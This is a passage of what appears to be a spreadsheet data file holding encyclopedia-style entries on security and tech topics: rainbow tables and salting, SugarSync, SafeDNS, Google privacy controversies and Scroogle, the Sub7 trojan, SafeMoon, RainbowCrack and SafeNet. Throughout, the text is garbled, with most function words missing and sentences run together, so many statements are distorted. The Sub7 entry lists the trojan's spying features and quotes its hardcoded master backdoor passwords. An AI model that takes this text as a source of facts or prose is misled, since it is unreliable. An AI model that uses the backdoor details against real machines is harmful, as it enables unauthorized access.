fast, table big. once chains longer, lookup slows, table size goes down. simple hash chains several flaws, serious chains collide (produce value), merge consequently table cover many passwords despite computational cost generate. because chains stored entirety, impossible detect efficiently. example, third value chain matches second value chain chains cover almost sequence values, final values same. derivation function unlikely produce collisions usually considered important security feature reduction function need correctly cover likely plaintexts, cannot collision resistant. other difficulties result importance choosing correct function picking identity little better brute force approach. only attacker good idea likely plaintexts choose function makes sure time space used likely plaintexts, entire space possible passwords. effect shepherds results prior calculations back likely plaintexts benefit comes drawback likely produce every possible plaintext class attacker wishes check denying certainty attacker passwords came chosen class. also difficult design function match expected distribution plaintexts. rainbow tables rainbow tables effectively solve problem collisions ordinary hash chains replacing single reduction function sequence related reduction functions way, chains collide merge must value iteration: consequently, final values chain identical. final postprocessing pass sort chains table remove "duplicate" chains final values chains. chains generated fill table. these chains collision-free (they overlap briefly) merge, drastically reducing overall number collisions.using sequences reduction functions changes lookup done: interest found location chain, necessary generate different chains. first chain assumes last position applies next chain assumes hash value second-to-last hash position applies rk−1, last chain, applies reduction functions, alternating this creates producing false alarm: incorrect "guess" position hash value needlessly evaluate chain. although rainbow tables follow chains, make fewer tables: simple hash chain tables cannot grow beyond certain size without rapidly becoming inefficient merging chains; deal this, maintain multiple tables, lookup must search table. rainbow tables achieve similar performance tables times larger, allowing perform factor fewer lookups. example starting ("re3xes") image below, computes last reduction used table checks whether password appears last column table (step test fails (rambo appear table), computes chain last reductions (these reductions represented step note: test fails again, continues reductions, reductions, etc. password found. chain contains password, attack failed. test positive (step linux23 appears chain table), password retrieved beginning chain produces linux23. here find passwd beginning corresponding chain stored table. point (step generates chain compares iteration target key. test valid find re3xes chain. current value (culture) produced whole chain: attack successful. rainbow tables refined algorithm different reduction function "link" chain, collision chains, chains merge long collision occur position chain. this increases probability correct crack given table size, cost squaring number steps required lookup, lookup routine also needs iterate index first reduction function used chain.rainbow tables specific function created e.g., tables crack hashes. theory technique invented philippe oechslin fast form time/memory tradeoff, implemented windows password cracker ophcrack. powerful rainbowcrack program later developed generate rainbow tables variety character sets hashing algorithms, including hash, md5, sha-1. simple case reduction function collision, given complete rainbow table (one makes sure find corresponding password given hash) size password |p|, time needed compute table, length table average time needed find value matching given directly related: {\displaystyle t=|p|} {\displaystyle t={\frac {|p|}{2l}}} thus 8-character lowercase alphanumeric passwords case (|p| 3×1012) would easily tractable personal computer 16-character lowercase alphanumeric passwords case (|p| 1025) would completely intractable. defense rainbow tables rainbow table ineffective one-way hashes include large salts. example, consider password hash generated using following function (where concatenation operator): saltedhash(password) hash(password salt) saltedhash(password) hash(hash(password) salt) salt value secret generated random stored password hash. large salt value prevents precomputation attacks, including rainbow tables, ensuring user's password hashed uniquely. this means users password different password hashes (assuming different salts used). order succeed, attacker needs precompute tables possible salt value. salt must large enough, otherwise attacker make table salt value. older unix passwords used 12-bit salt would require 4096 tables, significant increase cost attacker, impractical terabyte hard drives. sha2-crypt bcrypt methods—used linux, unixes, solaris—have salts bits. these larger salt values make precomputation attacks systems infeasible almost length password. even attacker could generate million tables second, would still need billions years generate tables possible salts. another technique helps prevent precomputation attacks stretching. when stretching used, salt, password, intermediate hash values underlying hash function multiple times increase computation time required hash password. instance, md5-crypt uses 1000 iteration loop repeatedly feeds salt, password, current intermediate hash value back underlying hash function. user's password hash concatenation salt value (which secret) final hash. extra time noticeable users wait fraction second time hand, stretching reduces effectiveness brute-force attacks proportion number iterations reduces number attempts attacker perform given time frame. this principle applied md5-crypt bcrypt. also greatly increases time needed build precomputed table, absence salt, needs done once. alternative approach, called strengthening, extends random salt, (unlike stretching) securely deletes salt. this forces attacker legitimate users perform brute-force search salt value. although paper introduced stretching referred earlier technique intentionally chose different name, term "key strengthening" often (arguably incorrectly) used refer stretching. rainbow tables precomputation attacks work passwords contain symbols outside range presupposed, longer precomputed attacker. however, tables generated take account common ways users attempt choose secure passwords, adding number special character. because sizable investment computing processing, rainbow tables beyond fourteen places length common. choosing password longer fourteen characters force attacker resort brute-force methods.specific intensive efforts focused hash, older hash algorithm used microsoft, publicly available. hash particularly vulnerable passwords longer characters broken sections, hashed separately. choosing password fifteen characters longer guarantees hash generated. common uses nearly distributions variations unix, linux, hashes salts, though many applications hash (typically md5) salt. microsoft windows nt/2000 family uses manager manager hashing method (based md4) also unsalted, makes popularly generated tables. rainbow tables seen reduced usage 2020 salting common gpu-based brute force attacks become practical. however, rainbow tables available eight nine character ntlm passwords. also a5/1 brute-force attack distrrtgen pollard's kangaroo algorithm notes references oechslin, philippe (2003-08-17). "making faster cryptanalytic time-memory trade-off". making faster cryptanalytical time-memory trade-off (pdf). advances cryptology: proceedings crypto 2003, 23rd annual international cryptology conference. lecture notes computer science. vol. 2729. santa barbara, california, usa: springer. 617–630. doi:10.1007/978-3-540-45146-4_36. isbn 978-3-540-40674-7. external links ophcrack page philippe oechslin original rainbow table research cryptography curlie</t>
  </si>
  <si>
    <t>SugarSync</t>
  </si>
  <si>
    <t>sugarsync cloud service enables active synchronization files across computers devices file backup, access, syncing, sharing variety operating systems, android, ios, windows devices. linux, discontinued unofficial third-party client available. overview sugarsync program automatically refreshes sync constantly monitoring changes files—additions, deletions, edits—and syncs changes sugarsync servers. linked devices also sync sugarsync servers. deleted files archived "deleted files" folder. event local sync folder stored device later becomes unavailable (secondary hard drive failure, etc.) sugarsync program interpret event user purposely deleted entire synchronization folder, resulting deletion files user's storage account. limitation, best store local synchronization folder boot drive. files deleted user actually removed sugarsync servers user manually; however, recovery larger nested folder structure difficult.originally offering free plan several paid plans, company transitioned paid-only model february 2014. under model, company offered temporary promotional pricing encouraged subscribers subscription auto-renewal. however, auto-renewal takes place non-promotional rate refunds allowed model. moreover, account cannot auto-renewed expiration credit card change payment terms, account automatically cancelled data deleted company's servers time account cancelled. emailed warnings received, sugarsync delete company's entire cloud-computing storage account. furthermore, general user, renewal reminders sent, account renews, refunds provided. company history sugarsync born company named sharpcast, incorporated 2004 gibu thomas (ceo) strong (chief technical officer). 2006, sharpcast unveiled sharpcast photos, tool synchronizing images multiple devices including mobile phones. both founders left company november 2008. december 2008, laura yecies appointed ceo. yecies team re-focused company renamed sugarsync, inc. 2009. company headquartered mateo, california. march 2013, mike grossman took ceo. self-introductory blog promised focus business mobile, sharing collaboration, enhancing sync mirrored capabilities product. blog post inundated requests linux client google result searches relating sugarsync linux returned grossman's introductory message.sugarsync acquired global march 2015. product history company's first product sharpcast photos, software designed make easier people view photos multiple devices share internet.sharpcast photos shut 2009. users given option migrate sugarsync service retrieve photos. june 2013 samir mehta posted, introductory blog post sugarsync's ceo, sugarsync process evaluating sugarsync linux app". january 2015, news posted linux client sugarsync.in december 2013, sugarsync announced would discontinuing free plan transitioning paid-only service february 2014. third-party addons march 2010, sugarsync unveiled api. result, several unofficial sugarsync addons applications available. these addons come form services browser extensions desktop applications sugarsync linux desktop client (now discontinued) mark willis. also comparison file synchronization software comparison online backup services references external links official website</t>
  </si>
  <si>
    <t>SafeDNS</t>
  </si>
  <si>
    <t>safedns company founded 2010 virginia, provides filtering block malicious websites either windows device network parental control. products safedns products include: appblocker block access applications approved. parental control filtering dangerous online content children. history 2013, safedns launched commercial version products corporate users.in 2015 safedns parental control service reviewed magazine average rating. additionally, safedns parental control certified av-comparatives, european test online safety anti-virus software. also google public norton connectsafe opendns zscaler references</t>
  </si>
  <si>
    <t>Scroogle</t>
  </si>
  <si>
    <t>google's changes privacy policy march 2012 enabled company share data across wide variety services. these embedded services include millions third-party websites adsense analytics. policy widely criticized creating environment discourages internet-innovation making internet users fearful wary online.around december 2009, privacy concerns raised, google's eric schmidt declared: something want anyone know, maybe first place. really need kind privacy, reality search engines—including google—do retain information time important, example, subject united states patriot possible information could made available authorities."privacy international raised concerns regarding dangers privacy implications centrally located, widely popular data warehouse millions internet users' searches, controversial existing u.s. law, google forced hand information u.s. government. 2007 consultation report, privacy international ranked google "hostile privacy", lowest rating report, making google company list receive ranking.at techonomy conference 2010, eric schmidt predicted "true transparency anonymity" path take internet: world asynchronous threats dangerous identify you. need [verified] name service people. governments demand it." also said that, look enough messaging location, artificial intelligence, predict going show photos identify are. think photos internet? you've facebook photos!"in summer 2016, google quietly dropped personally-identifiable info doubleclick service. google's privacy policy changed state "may" combine web-browsing records obtained doubleclick company learns google services. while users automatically opted-in, existing users asked wanted opt-in, remains possible opt-out going "activity controls" account" page google account. propublica states "the practical result change doubleclick follow people around customized based name information google knows you. also means google could now, wished build complete portrait user name, based everything write email, every website visit searches conduct." google contacted propublica correct fact "currently" gmail keywords target ads.shona ghosh, journalist business insider, noted increasing digital resistance movement google grown. major critics google order organize abstain using google products reddit page subreddit r/degoogle. electronic frontier foundation (eff), nonprofit organization deals civil liberties, raised concerns regarding privacy issues pertaining student data conducting survey showed majority parents, students teachers concerned student privacy breached. according eff, federal trade commission ignored complaints public google harvesting student data search results even holding talks department education 2018.google blocks privacy proposals using veto power. potential data disclosure data leaks march 2009, google reported google docs allowed unintended access private documents. believed pcworld 0.05% documents stored service affected bug. google stated fixed. cookies google places cookies user's computer, used track person's browsing large number unrelated websites, track search history. user logged google service, google also uses cookies record google account accessing website search. originally cookie expire 2038, although could manually deleted user refused setting browser preference. 2007, google's cookie expired years, renewed whenever google service used. 2011, google said anonymizes address data collects, nine months, association cookies accesses months. 2016, google's privacy policy promise anything whether records users' browsing searching deleted records.the non-profit group public information research launched google watch, website advertised look google's monopoly, algorithms, privacy issues." site raised questions relating google's storage cookies, 2007 life span years incorporated unique enabled creation user data log. google faced criticism release google buzz, google's version social networking, gmail users contact lists automatically made public unless opted out.google shares information enforcement government agencies upon receiving request. majority requests involve review approval court judge. tracking google suspected collecting aggregating data internet users various tools provides developers, google analytics, google play services, recaptcha, google fonts, google apis. this could enable google determine user's route internet tracking address used successive sites (cross-domain tracking). linked information made available google apis, widely used, google might able provide quite complete user profile linked address user. this kind data invaluable marketing agencies, google increase efficiency marketing advertising activities.google encourages developers tools communicate end-user addresses google: "developers also encouraged make userip parameter supply address end-user whose behalf making request. doing help distinguish legitimate server-side traffic traffic come end-user." recaptcha uses google.com domain instead specific recaptcha. this allows google receive cookies already user, effectively bypassing restrictions setting third party cookies allowing traffic correlation google's services, users use. recaptcha collects enough information could reliably de-anonymize many users simply wish prove robot.google many sites services makes difficult track information could viewed online. following continuous backlash aggressive tracking unknown data retention periods, google tried appeal growing number privacy conscious people. google 2019, announced plans limit data retention period services, starting activity. users select months months within google account dashboard. data retention period limit disabled default. gmail steve ballmer, figueroa, mark rasch, editors google watch believe processing email message content google's gmail service goes beyond proper use. google inc. claims mail sent gmail never read human account holder, content read computers used improve relevance advertisements block spam emails. privacy policies popular email services, like outlook.com yahoo, allow users' personal information collected utilized advertising purposes.in 2004, thirty-one privacy civil liberties organizations wrote letter calling upon google suspend gmail service privacy issues adequately addressed. letter also called upon google clarify written information policies regarding data retention data sharing among business units. organizations voiced concerns google's plan scan text incoming messages purposes placement, noting scanning confidential email inserting third party content violates implicit trust email service provider. 2013, microsoft launched advertising campaign attack google scanning email messages, arguing gmail users aware google monitors personal messages deliver targeted ads. microsoft claims email service outlook scan contents messages microsoft spokesperson called issue privacy "google's kryptonite." other concerns include unlimited period data retention google's policies allow, potential unintended secondary uses information gmail collects stores.a court filing uncovered advocacy group consumer watchdog august 2013 revealed google stated court filing "reasonable expectation" exists among gmail users regard assured confidentiality emails. according british newspaper, guardian, "google's court filing referring users email providers email gmail users gmail users themselves". response lawsuit filed 2013, google explained: users email must necessarily expect emails subject automated processing just sender letter business colleague cannot surprised recipient's assistant opens letter, people web-based email today cannot surprised communications processed recipient's [electronic communications service] provider course delivery. google spokesperson stated media august 2013 corporation takes privacy security concerns gmail users "very seriously."a federal judge declined dissolve lawsuit made gmail users opposed analyzing content messenger selling byproducts.in 2017, google stopped personalizing gmail ads. ties february 2010, google reported working agreement national security agency (nsa) investigate recent attacks network. while deal give access google's data users' searches e-mail communications accounts google sharing proprietary data agency, privacy civil rights advocates concerned.in october 2004, google acquired keyhole, mapping company. february 2004, acquisition google, keyhole received investment in-q-tel, cia's investment arm. july 2010 reported investment arms (in-q-tel) google (google ventures) investing recorded future, company specializing predictive analytics—monitoring real time using information predict future. private corporations using similar systems since 1990s, involvement google cia, large data stores, raised privacy concerns.in 2011, federal district court judge united states turned freedom information request, submitted electronic privacy information center. 2012, court appeals upheld ruling. request attempted disclose records regarding 2010 cyber-attack google users china. stated revealing information would make government information systems vulnerable attack. refused confirm deny existence records, existence relationship google.leaked documents obtained guardian washington post june 2013 included google list companies cooperate nsa's prism surveillance program, authorizes government secretly access data non-us citizens hosted american companies without warrant. following leak, government officials acknowledged existence program. according leaked documents, direct access servers companies, amount data collected program growing fast years prior leak. google denied existence "government backdoor". government requests google criticized disclosing much information governments quickly disclosing information governments need enforce laws. april 2010, google, first time, released details often countries around world hand user data censor information. online tools make updated data available everyone.between july december 2009, brazil topped list user data requests 3,663, made 3,580, 1,166, india 1,061. brazil also made largest number requests remove content 291, followed germany 188, india 142, 123. google, stopped offering search services china month data released, said could release information requests chinese government information regarded state secret.google's chief legal officer said, "the vast majority requests valid information needed legitimate criminal investigations removal child pornography".march 2019 supreme court risked million settlement google formed lawsuit claims invading privacy. google chrome 2008, consumer watchdog produced video showing google chrome records user types address field sends information google servers populate search suggestions. video includes discussion regarding potential privacy implications feature. incognito browsing mode google chrome includes private browsing feature called "incognito browsing mode" prevents browser permanently storing browsing download history information cookies. using incognito mode prevents tracking browser. however, individual websites visited still track store information visits. particular, searches performed signed google account saved part account's history. addition, programs used stream media files, invoked within chrome, still record history information, even incognito mode used. furthermore, limitation apple's platform allows information incognito browser windows leak regular chrome browser windows. there concerns limitations chrome users believe incognito mode provides privacy protection actually does. street view google's online service, "street view", accused taking pictures viewing people's private homes and/or close people street know photographed. wi-fi networks information collection from 2006 2010, google streetview camera cars collected gigabytes data users unencrypted public private wi-fi networks countries. disclosures privacy policy given affected, owners wi-fi stations.google apologized said "acutely aware failed badly here" terms privacy protection, aware problem inquiry german regulators received, private data collected inadvertently, none private data used google's search engine services. representative consumer watchdog replied, "once again, google demonstrated lack concern privacy. computer engineers amok, push envelope gather whatever data fingers caught cookie jar." sign legal penalties result, google said destroy data permitted regulators.the streetview data collection prompted several lawsuits united states. suits consolidated case california federal court. google's motion case dismissed, saying wi-fi communications captured "readily accessible general public" therefore violation federal wiretapping laws, rejected june 2011 u.s. district court northern district california upon appeal september 2013 u.s. court appeals ninth circuit. ruling viewed major legal setback google allows case move back lower court trial.currently google longer collects wifi data streetview, instead using android device's wi-fi positioning system; however, suggested creation unified approach opting-out wi-fi-based positioning systems, suggesting usage word "nomap" appended wireless access point's ssid exclude google's database. youtube july 2008, viacom compromised protect youtube users' personal data billion copyright lawsuit. google agreed anonymize user information internet protocol addresses youtube subsidiary handing data viacom. privacy deal also applied litigants including premier league, rodgers hammerstein organization scottish premier league. deal however extend anonymity employees, viacom wishes prove google staff aware uploading illegal material site. parties therefore meet matter lest data made available court. youtube forced $170 million implement privacy systems following complaint platform's enforcement children's online privacy protection act. google buzz february 2010, google launched google buzz, google's microblogging service. anyone gmail account automatically added contact pre-existing gmail contacts, wish participate.the launch google buzz "opt-out" social network immediately drew criticism violating user privacy automatically allowed gmail users' contacts view contacts. 2011, united states federal trade commission initiated commission proceeding respondent google, inc., alleging certain personal information gmail users shared without users' permission google buzz social network. real names, google+, nymwars google plus (g+) launched late june 2011. service gained million members weeks. time launch, site's user content conduct policy stated, help fight spam prevent fake profiles, name friends, family co-workers usually call you." starting july 2011, google began enforcing policy suspending accounts used pseudonyms. starting august 2011, google provided four-day grace period enforcing real name policy suspending accounts. four days allowed members time change name real name. policy extended accounts google services, including gmail youtube, although accounts existing policy required updated. late january 2012 google began allowing members nicknames, maiden names, "established" names addition common real names.according google, real name policy makes google like real world. people find easily, like phone book. real name policy protects children young adults cyber-bullying, bullies hide behind names. there considerable search engines "people-searching", attempting find information persons performing search name.a number high-profile commentators publicly criticized google's policies, including technologists jamie zawinski, kevin marks, robert scoble organizations electronic frontier foundation.criticisms wide-ranging, example: policy like real world, real names personal information known everyone off-line world. policy fails acknowledge long-standing internet culture conventions. using real names online disadvantage endanger individuals, victims violence harassment. policy prevents users protecting hiding identity. example, person reports human rights violation crime posts youtube longer anonymously. dangers include possible hate crimes, retaliation whistle-blowers, executions rebels, religious persecution, revenge victims witnesses crimes. using pseudonym different anonymity, pseudonym used consistently denotes "authentic personality". google's arguments fail address financial gain represented connecting personal data real-world identities. google inconsistently enforced policy, especially making exceptions celebrities using pseudonyms mononyms. policy stated insufficient preventing spam. policy afoul legal constraints german "telemediengesetz" federal law, makes anonymous access online services legal requirement. policy prevent trolls. social media encourage growth healthy social norms, forcefully telling people must behave cannot efficient. track april 2011, google criticized signing onto track feature chrome incorporated modern browsers, including firefox, internet explorer, safari, opera. critics pointed patent google granted april 2011, greatly enhanced user tracking advertising, provide much detailed information user behavior track would hurt google's ability exploit this. software reviewer kurt bakke conceivably tech wrote: google said intends charge advertisers based click-through rates, certain user activities pay-for-performance model. entire patent seems google's recent claims chrome critical google maintain search dominance chrome browser chrome described tool lock users google's search engine ultimately advertising services. likely google follow do-not-track trend? likely. mozilla developer dotzler noted: seems pretty obvious chrome team bowing pressure google's advertising business that's real shame. hoped they'd demonstrate independence that."at time criticisms, google argued technology useless, advertisers required obey user's tracking preferences remains unclear constitutes tracking opposed storing statistical data user preferences). alternative, google continues offer extension called "keep opt-outs" permanently prevents advertising companies installing cookies user's computer.the reaction extension mixed. paul thurrott windows called extension "much, much closer i've asking for—i.e. something works require user figure anything out—than firefox solutions" lamenting fact extension included part browser itself.in february 2012, google announced chrome would incorporate track feature 2012, implemented early november 2012.moreover, douglas (2016) study “don’t google know lonely”, presented strong evidence giant techs high accuracy providing results based user's sensitive entries. douglas (2016) specifically focused user's financial sexual preferences concluded "for google, 100% user sessions sensitive topic reject hypothesis learning sensitive topic search engine taken place identified sensitive. bing, corresponding detection rate 91%." scroogle scroogle, named fictional character ebenezer scrooge, service allowed users perform google searches anonymously. focused heavily searcher privacy blocking google cookies saving files. service launched 2003 google critic daniel brandt, concerned google collecting personal information users.scroogle offered interface browser plugins firefox, google chrome, internet explorer allowed users google searches anonymously. service scraped google search results, removing sponsored links. only search results returned, meaning features page preview available. added security, scroogle gave users option communication computer search page encrypted. although scroogle's activities technically violated google's terms service, google generally tolerated existence, whitelisting site multiple occasions. after 2005, service encountered rapid growth running series problems starting 2010. february 2012, service permanently shut creator combination throttling search requests google denial-of-service attack unknown person group.before demise, scroogle handled around 350,000 queries daily, ranked among 4,000 sites worldwide 2,500 united states, canada, united kingdom, australia, countries traffic. privacy data protection cases issues country european union european union (eu) data protection officials (the article working party advise privacy policy) written google asking company justify policy keeping information individuals' internet searches years. letter questioned whether google "fulfilled necessary requirements" laws concerning data protection. 2007, google agreed privacy policy vague, constantly working making clearer users.after google merged different privacy policies single march 2012, working group european union data protection authorities assessed failed comply legal framework. several countries opened cases investigate possible breach privacy rules.google also implicated google spain aepd mario costeja gonzález, case audiencia nacional (spain's national court) european court justice, required google comply european privacy laws (i.e., data protection directive) allow users forgotten operating european union. czech republic starting 2010, five months unsuccessful negotiations google, czech office personal data protection prevented street view taking pictures locations. office described google's program taking pictures "beyond extent ordinary sight street", claimed "disproportionately invaded citizens' privacy." google resumed street view czech republic 2012 agreed number limitations similar concessions google made countries. france january 2014, french authority, cnil sanctioned google, requiring highest display search engine website banner referring decision. google complied, planned appeal supreme court administrative justice, conseil d'etat. number french german companies came together form group called open internet project, seeking google's manipulative favoring services content others. germany 2010, google unable meet deadline hamburg's data protection supervisor hand data illegally collected unsecured home wireless networks. google added, hope, given time, able resolve difficult issue." data turned german, french, spanish authorities early june 2010.in november 2010, vandals germany targeted houses opted google's street view.in april 2011, google announced expand street view program germany, already photographed—around cities' worth pictures—will remain available. this decision came despite earlier berlin state supreme court ruling google's street view program legal.in september 2014, official germany called google broken publishers fighting court compensation snippets text appear google news updates. chief executive axel springer, german publishing giant, expressed fears google's growing influence country. italy february 2010, complaint brought italian advocacy group people down's syndrome, vividown, boy's father, three google executives handed six-month suspended sentences breach italian personal data protection code relation video, uploaded google video 2006, disabled bullied several classmates. december 2012, convictions sentences overturned appeal. norway data inspectorate norway (norway member investigated google (and others) stated 24-month period retaining data proposed google long. united kingdom march 2015, court appeal ruled british persons right google misuse private information. united states early 2005, united states department justice filed motion federal court force google comply subpoena "the text search string entered onto google's search engine two-month period (absent information identifying person entered query)." google fought subpoena, concerns users' privacy. march 2006, court ruled partially google's favor, recognizing privacy implications turning search terms refusing grant access.in april 2008, pittsburgh couple, aaron christine boring, sued google "invasion privacy". they claimed street view made photo home available online, diminished value house, purchased privacy. they lost case pennsylvania court. "while easy imagine many whose property appears google's virtual maps resent privacy implications, hard believe exquisitely sensitive would suffer shame humiliation," judge ruled; boring family paid dollar google incident.in 2010, u.s. district court portland, oregon ordered google hand copies wireless data company's street view program collected photographed neighborhoods.in 2012 2013, google reached settlements tracking people online without knowledge bypassing privacy settings apple’s safari browser. first settlement august 2012 $22.5 million federal trade commission—the largest civil penalty ever obtained violation commission order. second november 2013 settlement million states district columbia. addition fines, google agreed avoid using software overrides browser's cookie-blocking settings, avoid omitting misrepresenting information individuals google products control see, maintain five years page explaining cookies control them, ensure cookies tied safari browsers expire. settlements google denied wrongdoing, said discontinued circumventing settings early 2012, practice publicly reported, stopped tracking safari users showing personalized ads.in september 2019, google fined $170 million federal trade commission york violation coppa regulations youtube platform. youtube required feature allow video uploaders flag videos made users years old. adverts prohibited videos flagged such. youtube also required parents' permission collecting personal information children. doubleclick combined google services summer 2016, google quietly dropped personally-identifiable info doubleclick service. google's privacy policy changed state "may" combine web-browsing records obtained doubleclick company learns google services. while users automatically opted existing users asked wanted remains possible activity controls account page google account. propublica stated "the practical result change doubleclick follow people around customized based name information google knows you. also means google could now, wished build complete portrait user name, based everything write email, every website visit searches conduct." google contacted propublica correct fact "currently" gmail keywords target ads. also don't evil google litigation googlization history google criticism facebook criticism microsoft criticism yahoo! distributed search engine internet privacy privacy concerns social networking services references external links "google's email service 'gmail' sacrifices privacy extra storage space", privacy rights clearinghouse, april 2004 "privacy group flunks google", lisa vaas, eweek.com, june 2007 "who's afraid google?", economist, august 2007 "googlist realism: google-china saga free-information regimes site cultural imperialism moral tensions", tricia wang, cultural bytes, june 2010 "how remove your google search history before google's privacy policy takes effect", galperin, electronic frontier foundation, february 2012</t>
  </si>
  <si>
    <t>SpywareBlaster</t>
  </si>
  <si>
    <t>spywareblaster antispyware antiadware program microsoft windows designed block installation activex malware. overview spywareblaster meant prevent download, installation execution spyware, adware, browser hijackers, dialers malicious programs based activex. spywareblaster works basis "blacklists" (activating "killbit") clsid known malware programs, preventing infecting protected computer. this approach differs many anti-spyware programs, typically offer user chance scan hard drive computer memory remove unwanted software installed. spywareblaster allows user prevent privacy risks tracking cookies. another feature ability restrict actions websites known distributors adware spyware. spywareblaster supports several browsers, including internet explorer, mozilla firefox, google chrome microsoft edge. spywareblaster currently distributed freeware, non-commercial users. also ad-aware spybot search destroy references external links official site</t>
  </si>
  <si>
    <t>Sub7</t>
  </si>
  <si>
    <t>sub7, subseven sub7server, trojan horse program originally released 1999. name derived spelling netbus backwards ("subten") swapping "ten" "seven". june 2021, development sub7 continued.because typical allow undetected unauthorized access, sub7 usually described trojan horse security experts. starting version (1999) could controlled irc. security book phrased "this stage malicious botnets come." additionally sub7 features deemed little legitimate remote administration like keystroke logging.sub7 worked windows windows family operating systems, including windows 8.1. history sub7 claimed creation hacker handle "mobman". some sources claim software developed unknown romanian programmer. until today, "mobman" claims creator, original ownership software clearly attributed specific individual. development occurred several years version scheduled release feb. 28th, 2010. 2006 (sub7legends.net) re-opened hundreds thousands users, kept sub7 alive clean downloads support software releases. subseven 2.3, released march 2010, revamped work 32-bit 64-bit versions windows includes tunnel password recovery browsers, instant messengers email clients. buggy written delphi original author used. website claimed longer active. june 2021, completely alpha version released similar look feel original release, developed original author. architecture features like remote admin programs, sub7 distributed server client. server program host must order machines controlled remotely, client program user runs machine control server/host computer security expert steve gibson said features, sub7 allows hacker take "virtually complete control" computer. sub7 invasive, said, anyone computer "might well hacker standing right next them" using computer.sub7 features netbus (webcam capture, multiple port redirect, user-friendly registry editor, chat more), always tries install windows directory activity logging. according security analysis, sub7's server-side (target computer) features include: recording: sound files microphone attached machine images attached video camera screen shots computer retrieving listing recorded cached passwords taking account used target machine (back popular messaging service); added version 2.1. this included ability disable local account read chat history features presumably intended used prank irritating purposes including: changing desktop colors opening closing optical drive swapping mouse buttons turning monitor off/on "text2speech" voice synthesizer allowed remote controller computer "talk" user penetration testing features, including port scanner port redirectoron client-side software "address book" allowed controller know target computers online. additionally server program could customized delivered so-called server editor idea borrowed back orifice 2000). customizations possible sub7 server editor included changing port addresses, displaying customized message upon installation could used example deceive victim mask true intent program". sub7 server could also configured notify controller address changes host machine email, irc.connections sub7 servers password protected chosen password. deeper reverse engineering analysis revealed however "subseven's author secretly included hardcoded master password trojans! trojan trojaned". version master password predatox 14438136782715101980 versions 2.2b. master password subseven defcon8 backdoor acidphreak. uses incidents subseven used gain unauthorized access computers. while used making mischief (such making sound files play nowhere, change screen colors, etc.), also read keystrokes occurred since last boot—a capability used steal passwords credit card numbers.in 2003, hacker began distributing spanish-language email purporting security firm symantec used trick recipients downloading sub7.although sub7 worm (has built-in self-propagation features) leveraged worms w32/leaves (2001).some versions sub7 include code hard drive killer format hard drive, code matched number "7889118" (mobman's rival trojan author.) also back orifice back orifice 2000 trojan horse (computing) malware backdoor (computing) rootkit minipanzer megapanzer file binder references external links website http://www.giac.org/paper/gcih/36/subseven-213-bonus/100239 darknet diaries podcast 20:mobman screenshot subseven v2.2 readme</t>
  </si>
  <si>
    <t>SafeInCloud</t>
  </si>
  <si>
    <t>safeincloud proprietary password manager securely store passwords credentials offline cloud. similar enpass functionality. features master password everything encrypted locally cloud synchronization google drive, dropbox, onedrive webdav cross browser platform support strong password generation password encryption autofill passwords help browser extensions portable access also comparison password managers references external links official website</t>
  </si>
  <si>
    <t>SpywareQuake</t>
  </si>
  <si>
    <t>spywarequake fake anti-malware program microsoft windows. commonly installed trojan horse programs, manually installed. spywarequake's latest update february 2007, 11:49:07 later updates ever recorded. references</t>
  </si>
  <si>
    <t>SpywareStrike</t>
  </si>
  <si>
    <t>SafeMoon</t>
  </si>
  <si>
    <t>safemoon cryptocurrency token created march 2021 binance smart chain blockchain.the token charges transactions, redistributed reflected) token holders directed wallets different currency, binance coin (bnb), controlled coin's authors. history safemoon released march 2021. slogan safemoon, "safely moon", derived phrase moon", meaning quickly rise price". safemoon john karony, former analyst united states department defense.according vice, march april 2021, safemoon increased value 23,225% following celebrity endorsements musicians lil' yachty nick carter youtuber logan paul, social media hype, exchange listings, retail investors. time, vice said "cryptocurrencies like safemoon still real-world use."in 2021, safemoon announced making presentation gambia provide "technology innovation learning purposes".in june 2021, project began beta testing safemoon wallet. released google play september 2021 store october 2021.in december 2021, safemoon released version (safemoon v2), updated version safemoon contract.safemoon announced plans launch blockchain, cryptocurrency exchange, hardware wallet, macro internet things infrastructure blockchain. security 2021, version token audited security auditing firm certik, identified "major issue" project's owners "control tokens funded safemoon's seller fee". criticism token described perjoratively 2021 "meme coin" alongside dogecoin shiba inu, much value attributed result market frenzy.the developers safemoon described "little proof previous success", token described financial experts "the furthest thing safe" "doesn't anything".after price safemoon token multiplied single week april 2021, opinion columnists various financial magazines likened safemoon ponzi scheme pyramid scheme, gains early investors paid incoming investors expected similar rate return, citing fact transaction sends portion transacted value existing holders token, well portion transacted value wallet controlled coin's authors.london capital's head research jasper lawler noted manual burn aspect safemoon paired controlling companies large stake coins opens project manipulation project controllers. also decentralized finance dogecoin references external links official website</t>
  </si>
  <si>
    <t>RainbowCrack</t>
  </si>
  <si>
    <t>rainbowcrack computer program generates rainbow tables used password cracking. rainbowcrack differs "conventional" brute force crackers uses large pre-computed tables called rainbow tables reduce length time needed crack password drastically. rainbowcrack developed shuanglei, implements improved time–memory tradeoff cryptanalysis attack originated philippe oechslin's ophcrack.some organizations made rainbowcrack's rainbow tables available free internet. also distrrtgen references external links project rainbowcrack developer's official site. rainbow tables rainbow crack tutorial recovering windows passwords rainbowcrack</t>
  </si>
  <si>
    <t>SafeNet</t>
  </si>
  <si>
    <t>safenet, inc. information security company based belcamp, maryland, united states, acquired august 2014 french security company gemalto. gemalto was, turn, acquired thales group 2019. former safenet's products include solutions enterprise authentication, data encryption, management. safenet's software monetization products sold thales sentinel brand. safenet notably largest suppliers encryption technology united states government.on august 2014, gemalto announced signed definitive agreement acquire 100% share capital safenet vector capital us$890 million debt free/cash free basis. subsequent acquisition gemalto french rival thales group completed april 2019. history 1983: safenet, founded 1983 timonium, industrial resource engineering former engineers, alan hastings technical visionary douglas kozlay. 1986: anthony caputo becomes silent investor company. 1987: anthony caputo takes helm company changes name information resource engineering. 1988: lawrence livermore labs becomes ire's first major customer. company moves operations white marsh, 1989: goes public initially trading pink sheets. 1989: rapidly becomes leader banking communications security seven u.s. banks customers encryption devices used swift (global interbank transfer system). end-to-end encryption system developed secured data x.25 public network, providing world's first "virtual private network." early adopters included bank montreal citibank. 1994: acquires connective strategies, inc., manufacturer voice data isdn products founded ceo, charles brown. october 1995: acquires swiss crypto manufacturer gretag data systems million. 1996: communications launches first commercial service using safenet technology. safenet adopted thirteen fifteen u.s. banks within years. 1997: stock plunges announcement restructuring contract. july 1998: major shareholder fails hostile takeover attempt ire. 2000: renamed safenet, inc. product line. 2001: company co-founder doug kozlay leaves safenet form biometric associates, technology company focused biometric-based authentication identity solutions. 2002: safenet acquires dutch company securealink. with collapse tech "bubble," safenet, public company strong sales channel, able acquire series promising security companies deep discounts. 